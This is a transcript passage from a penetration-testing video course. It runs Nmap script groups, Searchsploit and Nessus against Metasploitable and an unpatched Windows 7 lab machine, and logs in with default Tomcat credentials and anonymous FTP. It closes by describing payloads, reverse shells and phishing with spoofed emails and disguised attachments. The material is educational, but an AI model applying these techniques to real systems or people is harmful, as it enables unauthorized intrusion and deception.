Anonymous and Oracle Enum users. Now, these right here that you read are single script names, and these single scripts belong to this larger script group. Right here it also says scripts which use brute force attacks to determine credentials are placed in the brute category instead. So right here there are no scripts that are used for brute forcing. And what brute forcing simply means is running a bunch of usernames and passwords onto the target system to discover which one is the correct username and which one is the correct password. But more about brute forcing later on. For now, let us go and test some of these scripts. To run a scan with the script group, we can use nmap -- script, and after it we specify the script group. So in my case I will use auth, and I will scan my Metasploitable machine with the synscan. Remember, synscan requires sudo privileges, so let's add sudo and type in our password. As soon as it finishes, we're going to see whether this auth script group discovered any useful information for us regarding vulnerabilities. Okay, so it has finished. Let us see whether our script managed to detect anything unusual. So we get the standard output of all the open ports, and we also get some other information for some of the ports. For example, right here we get FTP anon, and this FTP anon is just a single script name from the nmap. It tells us that anonymous FTP login is allowed. What does this mean? Well, this is something that we will cover later. For now on, just keep in mind that anonymous login is allowed for the port 21. Under the SSH port, we get which authentication methods are supported, right here. Down here we get information for the SQL port. It tells us that root account has empty password. This can also be very useful for us. And right here we can see Tomcat, Tomcat. What does this mean? Well, this looks like a default Tomcat credentials. And if I go down here, it tells us post-scan script results. It says that this is a valid credential for Tomcat. It is for the service running on this port. Let us check this out. This might be the first vulnerability that we find. To check whether this is correct, we can go and open up Firefox, and we're going to make a connection to our Metasploitable on this port right here. So just find out the IP address of your Metasploitable, and if you scanned it right now, you already know it. So for me it is 192.168.1.6, and to make a connection to a port I will type 2 dots and then the port number. In my case, what seems to be a vulnerability is found on this port. So let's copy the port, and I will paste it right here. Oops. It seems that it only pasted the port. Let me just retype this and type the port like this. So 8180, and then visit this. And here we get the official Apache Tomcat page. Let's see whether we can find something interesting right here. And what we're looking for based on these credentials is a login screen. So this Tomcat administration seems interesting. If I click on it, it leads us to this admin page where we are required to specify username and password. And down here from our scan, we got Tomcat and Tomcat. Let's try it out and see whether it fits. If I type Tomcat for the username and Tomcat for the password, click on login. There it is. We managed to log in to the admin page of the Tomcat server. Great. This is our first vulnerability that we managed to discover and exploit. We are now in the administrator page of the Tomcat. Now, there are other things that we can do right here as well, but for now, we're just happy that we managed to gain access to the administrator page. Down here we have user databases, mail sessions, data sources, and these are all empty because this is a test machine. But if it was a real machine, this would probably all be filled with some other useful information. Great, let's leave this on side for now. So we managed to gain access to the Tomcat administrator page with the help of nmap script. Let's see what else we can do with scripts. So let's go and try out the malware scan. these scripts test whether the target platform is infected by malware or backdoors. Let's see whether our target is infected with malware. We can run the same command, just this time instead of auth, we're going to use malware. Let's run the scan. And let me Control-C this, just so we can make this faster. I'm going to use the -F option to scan only 100 ports and not 1000 ports. And it doesn't seem to find any malware right here. But what you can do with this scan, you can wait for us to first exploit the Metasploitable in the next section, and then test this scan once again to see whether you can notice any backdoors that we uploaded that are making connection to our Kali Linux machine. For now, it doesn't seem to give us any result for the first 100 ports. Let's try another scan. We're going to use right now the banner script group. And what banners are simply what the open port will give us as the information once we connect to it. Banners usually hold information disclosure, and by information disclosure they can give us the exact version of the software running on an open port. And we can see the scan has finished, and we get the banner, which holds the version for the FTP. We get the banner for the SSH that also holds the version, and this is something similar for the version scan that we covered in Nmap. Now, sometimes banner will look something like this, and this is something that we cannot read. But I will show you in the exploitation section that this telnet port is one of the easiest ports to exploit and gain access to Metasploitable. And we are going to do this over banner. For now, it seems that we cannot even read this banner, but later we're going to use the exact same banner for telnet to gain access to the Metasploitable. Let's check out another scan. Let's try this scan group, and this scan group is called exploit. And while it runs, if I go right here and try to find that scan group, it tells us that the scripts that belong to this exploit scan group aim to actively exploit some vulnerability. Here are some of the examples of the script names that belong to the group. So this script group will actually try to exploit if it finds a vulnerability. Let's see whether it finished, and it did finish. Right here we can see port 80. Spidering limited to this found the following possible CSRF vulnerabilities. So here are the possible vulnerabilities that it found for this specific vulnerability. And from now on, don't worry about this type of vulnerabilities for the HTTP port we are going to cover in the website penetration testing section. For now, we're just taking a look at how we can discover them using vulnerability analysis. Let's go all the way up. And for the FTP port, it tells us right here that the port is vulnerable. It is running this version, and it seems that it managed to exploit it, as it says right here, vulnerable and exploitable. And right here we get the exploit results. The Nmap script ran this command, and it actually managed to get the root account on the target machine. So we found another vulnerability. Here is the FTP port that is exploitable. Now, we don't really know how to exploit it yet, but for now, with the help of scripts and vulnerability analysis, we know that this right here is exploitable. And in the exploitation section, we're going to see exactly how we can gain access and perform the same thing that the Nmap performed right here. Now, under these IDs, you will see this name right here. Now, get used to these type of names. This is how different vulnerabilities are labeled. This 2011 is a year when the vulnerability occurred. Okay, great. But these are just some of the script groups that we can run. Of course, we're not going to be running all of them in this video, since as you see right here, there is a lot of them. You can test them out and see what each and every one of them do. But for now, let us just see how we can run one script. We saw how we can run script groups, but sometimes you will only want to run a single script. And we already know that scripts are located inside of this directory, right here. And there is a lot of them. Let's go all the way up and try to find some cool script. This one seems interesting. Firewall bypass. And this .nse is just the extension for the scripts. And by the way, do not blindly run these scripts. what you can do to check out what exactly a certain script does is you can copy its name and then run the command sudo nmap --script -help and then the name of the script. So paste the script name and type enter. It will tell us that this particular script detects a vulnerability in NetFilter and other firewalls that use helpers to dynamically open ports for protocols such as FTP and SIP. Right here it also tells us how the script works. So the script works by spoofing a packet from the target server asking for opening a related connection to a target port. And to run it, in case you want to run it, you can type sudo nmap --script, and it is similar to running the script groups. All we need to do is just paste the name of the script and add the IP address. It will start running this script onto the target, and for now it seems that we got the exact same output of a normal nmap scan. Usually you will get this output. That means the script didn't work. So since this one didn't seem to give any output, let's try another one. Let's try the one that we already know will give us an output, and that one is ftp anon.nse. And remember when we ran one of the script groups? This script gave us the output for the FTP port, telling us that anonymous FTP login is allowed. Let's see whether we get the same result right now. If I run it, go all the way up, and it tells us anonymous FTP login allowed. And I already told you that FTP anonymous login means that you can use anonymous username and a random password to log into the FTP. Let's see whether it will work. Let's just test it out. We are curious. We want to see what does this anonymous FTP login mean. To do that, we're going to connect to a target using FTP. So you just type FTP and then the IP address of the target machine, in our case of the Metasploitable, press enter, and right here it will ask us for the name. Let's type anonymous, and let's type the password. Here you can type anything you want. In my case I will just type password 123 and press enter, and here it is. Login successful. Remote system type is Unix. And now we can use the help command to see what are our available options inside of this FTP server. So we can run these commands right here. Great, it seems that FTP anonymous login is indeed allowed. But once again, more about FTP and the FTP vulnerabilities that we discovered in the exploitation section. For now, we managed to find out about some potential vulnerabilities, such as the Tomcat administrator login. The FTP port 21 showed to also be vulnerable. Remember when we ran the exploit script group, it told us that it is exploitable. But let's also see what else we can find using other vulnerability analysis tools. Welcome back. And in this video, I want to show you something that you will do every time you perform a penetration test. I want to show you how to manually search for vulnerabilities. And this is something that you will do a lot. You will use this more than any other tool that we covered. So what manual vulnerability analysis is us simply Googling the vulnerabilities. For example, suppose we are attacking a target, and right here I just performed the version scan for the Metasploitable. Imagine Metasploitable is our target, and we just performed this version scan. We got these different ports open and different versions. How do we know if they are vulnerable without using any tool? Well, what we can do is we can copy the name of the version that is running on an open port, then go to Google and just paste that name and add exploit. And here it is. We're already getting some response back. Python exploit for this version, which is the exact version that our Metasploitable has. vsftpd, the exact version that we have, backdoor command execution. And what you would do is you would just go to these links and try to find the exploit for it. Down here we already see that an exploit already exists. For which platform it is, we can see right here the source code if we want to. And here it is. The exploit is coded in Python in this case. And this is how you would do most of your vulnerability analysis. We also get the module options, and what these module options are is something that we will cover in the exploitation section. This is how we can exploit the target using tools. We're going to cover that shortly. For now on, this is the way that you can find out how to exploit the target. You just go through a bunch of links and see whether someone already came up with the exploit for that specific version. In this case, for the VSFTPD 2.3.4 version. And you would do this for any version that you discover. For example, you can go right here, Apache HTTPD, and copy the version. Make sure that you copy the number as well, which in our case is 2.2.8. Then go and paste the name of that version. Add exploit. And here we already get some output. Security vulnerabilities. If we click on it, we can see all of the vulnerabilities that this version of Apache has. Right here we can see which score they have, and the higher the score, the stronger the vulnerability. Right here we can see the vulnerability ID, which, remember from the last video I told you this format is used for vulnerabilities and you will see it a lot. And we can see all the vulnerabilities that it has. This one particularly we are really interested in. Why? Well, because it has the score 10. That means that it is a really strong vulnerability, most likely execution of code or remote access to the target. And it indeed is. It says right here, code execution. And if you click on it, you can see what this vulnerability does. You can see confidentiality impact is complete, integrity impact complete, availability impact complete. There is a total shutdown of the affected resource. The attacker can render the resource completely unavailable. So this also seems like some kind of a DOS attack. And down here we can see that this will most likely work only for Windows. As I'm noticing Windows right here a lot. Windows right here, Windows right here. Now of course you would read through this a little bit more detailed, but for now this doesn't seem as an exploit that would work on our Metasploitable, because Metasploitable is running on Linux. And this is what you would do most of your time, researching for vulnerabilities. This is how you find them, and then you search for the exploit created by someone else that you can use to exploit the target. Another thing that you can do is you can use a tool inside of the Kali Linux called Searchsploit. And Searchsploit, if I type --help, simply takes the input of the version of software, and then it searches through Kali Linux database through all of the exploits that Kali Linux has and tries to find an exploit that will work for that specific version. Right here we have some usage examples, but we don't need to perform these complicated commands. All we can do is copy, for example, some version. Let's say we copy this version of software, Unreal IRC, and copy this. And what we can do once we copy that version is type Searchsploit and then paste the version name. And we get the result. It will tell us right here there are already some existing exploits for the Unreal IRC. We also get which version are the exploits for. One of them are backdoor command execution. The second one is local configuration stack overflow. We also get the denial of service exploit. And on the right side, we get the path to those exploits. Right here, this one is under Linux remote and it is named 16922.rb. And this RB simply stands for Ruby. This is coded in Ruby language. One of them is for Windows, one of them is for Linux. Since we're running Metasploitable, we would only be interested in the Linux exploits. So let's try to navigate here. How we can find this exploit? Well, we can copy the name of the exploit and use locate command to find where exactly this exploit is located on our machine. And it is in this path right here. So you can copy to this directory, cd, and then paste the directory name. And if I were to nano 16922.rb, this will open an exploit that we would use to attack that Unreal IRC open port. As we can see, it also tells us that this is a backdoor program. This file is also part of Metasploit framework, and Metasploit framework is one of the biggest tools that we are going to cover in the next section. We'll cover all of the basics of it, and we will also cover how we can run exploits and attack different machines using this Metasploit framework. Okay, cool. We found an exploit for this specific software using Searchsploit. So now we know we got exploit for that version of software that we have on our Metasploitable. So this is usually how you would perform most of your vulnerability analysis. You either use tools like Searchsploit, or you manually try to find an exploit on Google to see whether anyone has exploited it before, and if they have, how did they do that? You would also use Nmap scripts sometimes, but I personally rarely use Nmap scripts for vulnerability analysis. And the last tool that we are going to cover for the vulnerability analysis is going to be Nessus, which we will see in the next section. That tool is huge, and you will use it a lot in your vulnerability analysis. See you there. Welcome back. In this video, we're going to see how we can install a really useful tool for vulnerability analysis. Probably one of the best tools that perform this process automatically. It is very easy to use, and this tool is called Nessus. To get it running, we must first download and install it. So to do that, open up your Firefox, and in the search bar, we can type Nessus. If we scroll down to this Tenable link that says Download Nessus Vulnerability Assessment, we can click on it, and right here we're going to see two different versions of Nessus that we can download. We can get the free version that allows us to scan up to 16 IP addresses. And by the way, this Nessus Essentials will only allow us to scan inside of the network. You will not be able to scan external IP addresses using this. However, you will get high speed, in-depth assessment, free training and guidance, and support via Tenable community. Once you start performing real-life penetration tests, and you start scanning different companies, their networks, and so on, this Nessus Professional option will be really useful for you. It tells you right here you get unlimited assessments, you can scan unlimited IP addresses, you can use it anywhere, you get live results, configuration assessments, bunch of different things, but it also comes with a really expensive price. However, this is something that pays off once you perform real-life penetration tests. Okay, right now we're interested in the free version, so let us click Download on the Nessus Essentials. So you can choose to register right here, or what else we can do is we can type Nessus download and download it straight away to our Cal Linux. We can click right here, download Nessus Tenable, and right here we are going to see different Nessus versions. In this case, since I'm running Cal Linux 64-bit, I'm interested in this Nessus Debian AMD 64. If I click on it, click on I agree, it will ask me whether I want to open or save the file. I want to save it, and it will download the file inside of my downloads directory. It will finish in just a few seconds. Here it is done, so let's click on this button right here. It will open our downloads directory, and once it opens up, we can lower this page right here and open terminal inside of the downloads directory. To install this, we can run sudo dpkg, which stands for dpackage, and then -i, which stands for install, and we can type the name of the Nessus. What you can do is you can just type capital N and then tab it to autocomplete it. Then press enter. It will ask me for the password. I will input it right here, and it will complete the installation process for us. Here it is, it finished in just a few seconds, and it tells us right here that we can start Nessus Scanner by typing this command. So let's just copy it right here. Let's run it, paste clipboard. Oh, we need to run it with user privileges, so let's type sudo and then paste the command. And it will tell us starting Nessus. Now, to go to Nessus, you need to copy this link right here. Copy the link, go to Firefox, open another page, we can close these two pages, and we can paste and go to that link. Let me enlarge this, and it will tell us potential security risk ahead. We don't really care about this, we know there is no risk right here, so click on Advanced and go down here, accept the risk and continue. Click on that. And this will start compiling plugins. This will take a few seconds, and soon it will ask us which version of Nessus we want to install. And we will also need to provide some additional information, such as email address and usernames and passwords. Here it is. Right here, specify Nessus Essentials and click on Continue. Right here, you will need to provide the first name, the last name, and the valid email address. Now, in case you don't use a valid one, you will not be able to use Nessus because it will send you the activation code to the email address that you specify right here. Now, since I already have an account, I will just skip this. And I will go and type my activation code right here. You should get this same window and the same question asked as soon as you specify the email address and the first and last name. Then you go to your email, find the activation code and type it in right here. Once you type your activation code, click on Continue. Username and password. I will set right here Mr. Hacker, which is my username, and I will type in my password. It will ask you to set up your own username and to set up your own password. You can use whatever you want. After it, click on Submit. It will tell me setup is complete, and now it will start the true preparation for Nessus. This process right here will take some time. And by some time, I think it might take even up to 30 or 14 minutes. So just take a small break until all of this is over, and we're going to continue with Nessus in the next video. Okay, that was loading for over an hour. But it is finally over, so we're ready to explore the Nessus tool. It is pretty simple to use. Your page should be blank since you haven't performed any scan yet. So we can click right here on this X button, just to see better this page. And all we want to do from here is go to the New Scan button. Right here, we will see all of the available options that we can do for our scans. So we got Basic Network Scan, as it says a full system scan suitable for any host. We got the Advanced Scan, Configure a Scan without using any recommendations, and we got a bunch of the other options, and for some of them we need the Nessus Professional version in order to use, such as this one, this one, this one, and all of these that have the upgrade on them. Now, as I already talked about, with Nessus Essentials, we're only going to be able to scan local IP addresses. Inside of a company, you could use this tool to scan their networks for vulnerabilities. However, you cannot scan an external IP address with this. So scanning a website is not going to work, unless it's inside of your network. Another thing to remind you is that we can scan with the free version up to 16 IP addresses. And if I'm not mistaken, those 16 IP addresses clean after 90 days, so after 90 days you will be able to scan more IP addresses, but I'm not sure about that. And if you have a free version and you have more than 16 targets, you will have to scan that network with multiple Nessus scans. So, scanning big enterprise networks for big companies will require Nessus Professional version. But what we want to do here, to learn Nessus and how to use it, we want to go onto the basic network scan. And this basic scan will require us to specify some options. Now, for our first scan, we'll be scanning only Metasploitable. So, turn it on if you haven't already. Check out the IP address of Metasploitable. In my case, it is 192.168.1.4. And once you do that, we can proceed to specify our options. In the General tab, under the name, you can specify anything you want. I will simply just type Metasploitable. Under the description, I will just leave this empty, there is nothing really to specify here. You can put anything you want here, just so you can recognize which type of scan you did and on which target you did it. In the folder, we will leave it on My Scans, and in the targets, we specify the IP address of our target machine. Since right now we are only scanning one machine, we will specify the IP address of Metasploitable. But if you were to scan a network, you would specify something like this. 192.168.1.1/24, in case it is a /24 network. I believe you can also specify it like this, so dash 192.168.1.255. But right now, let us just go with our Metasploitable. And with the free version, we can't even scan 255 hosts. Remember, we can only scan 16. Once you specify this, we want to proceed to the Schedule tab. And here, this Schedule tab is useful once you want to schedule your scans on a certain period of time, or you just want to schedule a scan while you're doing something else on the site. For now, we're going to leave it off. Under the notifications, you can choose if you want to send results to some emails over SMTP server. We're not going to be doing that right now. In the Discovery tab, this is the important stuff. Here we choose how many and which ports we want to scan. We have an option of scanning common ports, and this is similar to Nmap default port scan. It will only scan most popular ports. Or you can select Scan All Ports, which we're going to use right now, to scan all 65,000 ports on our Metasploitable. And if you want, there is a custom option, which is the third option right here, but we're pretty satisfied with this Scan All Ports option. If we read the settings, the general settings always test the NASys localhost, use fast network discovery. Under the port scanner settings, we have Scan All Ports, use netstat if credentials are provided, use SYN-scanner if necessary, and we're pinging hosts using TCP, ARP, and ICMP. Good. Once you set this to scan all ports, you can go to the assessment, and in the assessment tab, we can choose what we want to scan for. So there are a few options. If I click right here on the scan type, we have scan for known web vulnerabilities, scan for all web vulnerabilities, and scan for all web vulnerabilities complex. For the purposes of this tutorial, we will be scanning for known web vulnerabilities. Why? Well, this will just take lesser time to finish. When you run scan for complex web vulnerabilities, it usually takes a lot more time. And we can see right here under the general settings, avoid potential false alarms, enable CGI scanning, and web applications, we will crawl up to 1000 pages, up to 6 directories, and we will test for known vulnerabilities in commonly used web applications. These are our assessment settings. But also keep in mind that if we discover some web vulnerabilities, we will see how to attack them in the web penetration testing section. That will come right after the exploitation section. For now, let us just see whether NASys will find something juicy. Right after, we go to the report settings, and usually you want to leave this on default, so we're not going to be changing anything right here. And finally, in the advanced tab, we will leave it on default for now and proceed to click on Save. So click on Save right here, and you should have your scan right here. Now, you will notice that it does not automatically start. We must launch it. And we do that by clicking on this arrow right here, which says Launch. Click on it. In just a few seconds, here it is. These green arrows will start spinning, and our scan has officially started. This will try to discover all the vulnerabilities it can find for the Metasploitable machine. Now, keep in mind that these scans can take a lot longer than Nmap scans. You can always check the current state of scan by clicking on the scan name, in our case on the Metasploitable, and you will be able to see what it managed to find for now during the scan. Different vulnerabilities will be marked with different colors. We will have blue color, which means information disclosure, and what that is it possibly managed to find some information that should be private, or it managed to find the service version or something similar that allows us to find out more information about the target. It doesn't necessarily mean that the information is useful though. Then we have green, yellow, and orange vulnerabilities, or also known as low, medium, and high vulnerabilities. And at the end, we get the most interesting vulnerabilities, which are critical vulnerabilities. This usually includes remote code execution or something similar. So what you can also do, you can click on them, and this is just what it managed to find at this current point of scan. So we got one critical vulnerability for now. We got two mixed vulnerabilities, one medium vulnerability, and some information disclosure right here. Let's go back, and we're going to wait for this to finish, and once it's done, we will get back to it and see the results. Alright, it is finally over. And we can see, if I click on the scan, that it managed to discover a bunch of vulnerabilities. All kinds of them. Let us go through these results and see some of the vulnerabilities it found. Remember, we are most interested in critical and high vulnerabilities. Others can also be useful, but these two are the main ones. First thing we see is that it managed to find 7 critical vulnerabilities, 11 high vulnerabilities, 36 medium vulnerabilities, 7 low, and 148 information disclosure. Let us click on the scan. Right here we can order the vulnerabilities by their severity. So if I click on this arrow, it will go from the information to the critical, but mostly we are interested in critical vulnerabilities, so I will click it once again, and let's go with any one of them. We're going to see an example of each vulnerability. We're going to check 1 critical, 1 high, 1 medium, 1 low, and 1 information disclosure. Let's go, for example, with this one. So it says NFS exported share information disclosure. This is a critical vulnerability. Down here we can see the description, and it says at least one of the NFS shares exported by the remote server could be mounted by the scanning host. An attacker may be able to leverage this to read and possibly write files on remote host. It tells us what is the solution to fix this vulnerability, as it says configure NFS on the remote host so that only authorized hosts can mount its remote shares. Down here it tells us where it found the vulnerability. It found it on our Metasploitable on the 2049 UDP port. And what you would do, for example, is you would then Google this vulnerability, which we learned in the previous video where we covered Googling vulnerabilities and search exploit, and you would see how you would exploit this. For now, we know that this exists. Let's check another critical vulnerability. Let's go, for example, onto this one, bind shell backdoor detection. It says a shell is listening on a remote port without any authentication being required. An attacker may use it by connecting to the remote port and sending commands directly. This seems like a really big problem. And we're going to see in the next section how we can actually gain access from this critical vulnerability. It is very, very easy, trust me. But these types of misconfiguration happen often. Down here we can see the solution, verify the remote host has been compromised and reinstall the system if necessary. And the actual vulnerability is found on the port 1524 over TCP. Now, since critical vulnerabilities are most important, let us check another one. Let's go on to this one. VNC server password is password. So it seems that we get the default credentials for some software running on our Metasploitable. As it says, the VNC server running on the remote host is secured with a weak password. And this type of vulnerability is something that you will find the most. Now, it doesn't have to be anything connected to the VNC server, but weak credentials are something that even the biggest companies have. And you can have all the security in the world, but if your password is weak, none of that security will matter. Down here we see the Nessus logged in using a password. And what port was it on? It was port 5900 over TCP. So we will see how we can exploit all of this, but let us also check out some other vulnerabilities as well. Apache Tomcat AGP connector request injection. Let's click on it. This seems to be a high vulnerability, and it tells us a file read inclusion vulnerability was found in AGP connector. A remote unauthenticated attacker could exploit this vulnerability to read web application files from a vulnerable server. It tells us that the solution is to actually upgrade the Tomcat server to the newer version. And down here it tells us over which port did it find the vulnerability, which is port 8009. On the right side we can also see some additional vulnerability information, such as what is the vulnerability for. It is for Apache Tomcat. Is the exploit available? Yes, the exploit exists for this, and they are available. The patch was published on March 1st, 2020, and vulnerability was also published on that same day, and Nessus managed to successfully exploit it. Reference information, and here are the vulnerability names. So you would just type this, search for an exploit for it, and you would manage to exploit the Metasploitable machine. Let's check out a few more vulnerabilities, and then we're going to wrap up with this tutorial. Let's go to a medium one, and let's go, for example, to this one, SMB sign-in not required. Sign-in is not required on the remote SMB server. An authenticated remote attacker can exploit this to conduct man-in-the-middle attacks against the SMB server. Now, we have not covered man in the middle yet, but later in the course we will be devoting an entire section to this attack, to the man in the middle attack. So for now, we just know that the SMB port, which is running on port 445, is vulnerable to the man in the middle attacks. Okay, let us also check out some information disclosure. So right here we can see OpenSSL detection, service detection, GET request, SSL TLS version supported. So we can check out which SSL and TLS versions are supported. This plugin detects which SSL and TLS versions are supported by the remote service for encrypting communications. And this port seems to be running SSL version 2, SSL version 3, and TLS version 1. And these are just different protocols used for encryption of the data that is being transferred over this port. And once again, you will see that SSL is vulnerable to the man in the middle attack. We can decrypt this data using that specific attack. However, don't worry if you fully don't understand what I'm talking about. This is once again something that we will cover in a later section. Okay, great. Do you see right now how amazing this Nessus scanner is? It literally gave us most of the vulnerabilities just from a single scan. In the next section, we will see how to exploit most of these vulnerabilities on the Metasploitable, but on other targets as well. In the next video, we're going to scan other machine using Nessus, and we're going to see what results we get. See you in the next video. Welcome back. In this video, I want to show you another example of a Nessus scan. So in the previous one, we scanned our Metasploitable, which is a Linux machine. Right now, we're going to see what results can we get scanning a Windows machine. So I have right here Windows 7 virtual machine, and what's special about this machine is that it hasn't been updated in a year. And keep in mind, there are a lot of people in the world that don't regularly update their operating systems. This machine specifically doesn't have any additional software installed and running on open ports. The only open ports it has are these ones, and most of them are open by default once you install Windows 7. Let us see what our Nessus scan will manage to find on an unupdated Windows 7 machine. So let's go right here and go on to new scan. We already know how we can perform the scan, so I will not be explaining the details. We navigate to the basic scan and we can type right here Windows 7. The IP address I checked out right here, it is 192.168.1.6, and if I scan it, go to the discovery, we can scan all ports. In the assessment, we're going to scan for known web vulnerabilities. In the report, we leave everything default, and in the advanced, we leave it on default. I will click on save, and I will just run my scan. This will start scanning my Windows 7 machine, and in a few minutes we will receive the entire scan and all the vulnerabilities it managed to find for our Windows 7 machine. Once again, keep in mind that it doesn't have any additional software installed. I just installed an operating system and connected it to my network. Let's wait for the scan to finish, and we're going to see what it will manage to find. Okay, the scan has finished. Let us check out the results that Nessus gave us. If I click on my Windows 7, we will see it managed to find 4 critical vulnerabilities and 2 high vulnerabilities. And these are the vulnerabilities it found on Windows machine that hasn't been updated. Let us check them out. If I click on this and click on Microsoft Windows multiple issues, we will see 4 critical vulnerabilities. Unsupported Windows OS. This means that the Windows has not been updated, as it says right here, is either missing a service packet or is no longer supported. This simply means it hasn't been updated in a while. As a result, it is likely to contain security vulnerabilities, and that is true. We get the MS14, which it says right here, vulnerability in channel could allow remote code execution, uncredentialed check. And down here, we also get what type of vulnerability it is. So we could just search for that vulnerability, search for an exploit, and gain access to our Windows 7 machine. We also get this RDP, RCE, or also known as the Blue Keep attack. And as you can see right here, this attack is relatively new. It's from 2019. So for example, if there was anyone running Windows 7 that hasn't updated their machine since 2019, they are vulnerable to this attack. This attack exploits Remote Desktop Protocol, which is running over the port 3389. Cool, right? We managed to discover vulnerabilities and critical vulnerabilities for the Windows 7 machine. This Nessus tool is really amazing. However, there are also some vulnerabilities that it didn't manage to find. And I'm talking about really high vulnerabilities. So it is finally time. In the next section, we're going to see how we can exploit a bunch of these vulnerabilities, how we can gain access to the target, steal information from the target. We will see also how we can maintain access on the target, and we will see how we can cover our tracks. See you in the exploitation section. Alright, let us cool down for a second. We have finished everything we could to gather information about our target. We performed information gathering and port scanning. We know which ports our target has open. We also know which softwares are running on those open ports and what operating system does our target have. Then we performed vulnerability analysis using different tools like Nessus and Nmap. One reminder that the best vulnerability analysis you can perform is you Googling, since some tools might fail to find vulnerability. It might not be in their database, but if you find out a version of a software and you Google it, if that software is vulnerable, it will most likely come up in some page. Now it is time to get our hands dirty. In the next video, we're going to see how we can exploit our Metasploitable machine and gain access to it. And we will also be attacking some other machines as well. All of these previous steps led to this final moment: hacking the target. Take a break if you need, and once you are ready, I will see you in the next section. Hello again and welcome to the exploitation section of the course. It is time we learn how to gain access to our target. What we managed to do for now is, with the help of our Kali Linux machine, we managed to identify our target and find out a lot of information about it. Remember, once we were starting, we didn't know anything about it. But after, with the help of different tools such as Nmap, Nessus, Whatweb, and others, we managed to gather enough information about our target to be able to exploit it. We have discovered opened and closed ports. We also discovered services running on those ports, including their versions. We found out what operating system was our target running. And we have also tried finding vulnerabilities to see whether the target has some known issues or bugs. In other words, we performed information gathering, scanning, and vulnerability analysis. Right now, the next step is to use that information we have to gain access to our target. Here is how the process goes. Imagine this is our target, and these are the information that we gathered for it. It is running Windows 10. We found out it has an older version of Windows 10 that hasn't been updated lately. We found 3 open ports and 1 filtered port, and we know for sure that one of those open ports has a vulnerable software running on it, since we also performed vulnerability analysis. Once we found out this information, the next step is to extract useful information from this. So in this case, what we would find most interesting would be these 2 facts: an outdated Windows 10 operating system and a vulnerable software on port 1234. This is what we will use to attack the target. We would then exploit the target's vulnerability and gain access to it. But wait a second. What do I mean we would exploit the target? How do we do it exactly? And what does exploit the target even mean? Well, exploiting the target, in other words, is using its vulnerability that we discovered to send something called payload. What a payload is a program that we deliver to the target after the exploit. Usually, this program is something that allows us to execute commands on target system and navigate through its files and folders. Now, I know what you're thinking. It is still a little unclear to you as to how this works exactly. Don't worry, in the next 2 videos we will explain in details what exactly happens once we exploit a vulnerability, and what type of payloads exist, and which ones we will use the most. For now, it is important to remember that payload is a program that we drop after exploiting a target. And in 99.9% of cases, this will be a program that allows us to execute commands on target system, or also known as a shell. The first step would be us exploiting the target and sending shell or payload with it. That payload will then be on target's machine, and it will execute. Once it executes, what it essentially does is it tells the target machine connect to that other machine and allow it to execute commands on your system. And that other machine would be our Kali Linux. And the third step is pretty easy. We just send the commands that we want our target to execute. We navigate through files, run other programs, and in return, target sends us an output of the command that we executed. Picture it like using target's terminal from our Kali Linux machine. However, there is one problem with this. Imagine we have two different targets, target A and target B. And let's say target A has a known vulnerability. It is running some outdated software on port 5555, for example, and in that case, we would do what we just explained, which is exploit the target through the vulnerability and deliver the payload that will allow us to control that target machine. Well, this scenario would only work if the target has a vulnerability. But what if it doesn't have a vulnerability? What if all of its softwares are fully updated and secured? What then? In that case, we would do something similar. We would deliver the payload to the target, just this time we cannot do it through an exploit, which also means we can't make the payload auto-execute on the target, since once again there is no exploit that we can do. We must deliver the payload to target using different way, and also we must make it execute a different way. Well, in this case, social engineering comes in play. We would try to trick the user to open our payload by themselves. They must run it for us. How would we do that? Well, we could use different methods of delivering the payload. We could, for example, use an email containing our payload that we perhaps masked to look like an image or a different file type. We would also make sure that email looks legit and target doesn't think twice before trying to open that image. We could spoof our email address so it looks like someone that our target knows, so they would never think that the image we sent could contain something malicious. Once they open that image, in the background our payload executes, and it grants us access to their machine without them even knowing it. This is just an example. There are multiple ways that we can do this. If you were, for example, physically close to the target, you could infect it over USB drive. Plug the USB drive in the target machine and execute payload manually. But something like this you will almost never do, due to a higher risk of course, and if you were even able to come close to the target machine. Nonetheless, these are the two different possibilities. Either target is vulnerable, or it isn't. However, if it isn't, we don't just quit. We try different methods. Throughout this section, we will cover another big tool that all hackers use, and that tool is called Metasploit Framework. It contains thousands of exploits, and all of them are already in our Kali Linux machine. All we need to do is learn how to use them and how to run them. This is something we will cover shortly in great details. Let's start hacking. What exactly is a vulnerability? We talked about process of gaining access and making target execute our commands, but let us explain what happens once we exploit a vulnerability. Well, let's start like this. And trust me, if it sounds a little complicated, it will be more clear once we get to practical examples in the next few videos. For now, let's explain it like this. We know that developers write programs. They use their code, which can be written in any language, whether it is Python, Java, C, or some other language. The goal for developer is to create a software using a programming language. And as we mentioned, that software can be based on any language whatsoever. Once the software is complete and it goes through a few test checks and security checks, then that software gets deployed on machines and it can be ran from those machines. This can be any type of software, it doesn't matter. However, the problem occurs once that software is open to the internet. For example, FTP is open on some machines and servers for file transfer protocol. SSH could also be open for secure shell connection. HTTP could be open to host a web page that clients connect to. Basically, if your software is hosted on an open port, then it is also open for possible attacks from the outside. And as we already know that the software is consisted of code that developers wrote, problem occurs if that code is not well written, if it has some bugs. Now, it doesn't necessarily mean that if there is a bug that we can exploit the target, but sometimes those bugs can be critical, and the attacker could use that bug to make software act in a way that it is not intended to. That's called exploitable vulnerability. Usually once exploited, we drop a payload or a shell back, so we can control that machine and do what we want with it. Once a bug or vulnerability is discovered, it gets that name that we've seen for vulnerabilities in Nessus that starts with CVE, and then the year of when the vulnerability first occurred. A vulnerability that exists and has not been patched yet by the vendors is called 0 day. Usually as soon as critical 0 day is discovered, it gets patched almost immediately, but you will see examples of 0 days that were used for months before anyone found out about them. The most known recent one was in 2017, when the WannaCry ransomware occurred and infected a bunch of hospitals and police stations. It was based on an exploit called Eternal Blue, which was created and used by NSA. They never reported it and used it for their attacks until those exploits got stolen from them and got leaked. We will see in this course a lot of recent 0 days that are now patched. Some of them will even be as recent as just few months ago. However, all of this makes sense if the target has a vulnerability. But remember, vulnerabilities don't always have to be of technical nature. Imagine a company with a bunch of networks, servers and machines, fully secured and also protected by the best firewall. No security holes, no vulnerabilities. We can't even scan the target to figure out its infrastructure because its protection is so good. Now, imagine an employee that works there. Let's call him John. And let's focus on John at the moment. John likes cars. He usually searches for car pictures and videos while working. One day he gets an email from a person that has email name exactly the same as his colleague. In that email, there is a car picture. He sees that the email is coming from his colleague, so he doesn't question it. Therefore, he opens that picture at work, and it indeed is a car picture. But little does he know, that email was us spoofing an email for him, so that at the first glance it looks like it comes from his colleague, and that picture opened a car image, but it also ran our malicious program in the background. What happens next? Now, John's work computer is infected, and he doesn't even know it. And from his computer, we can compromise the entire network and the entire inside of that 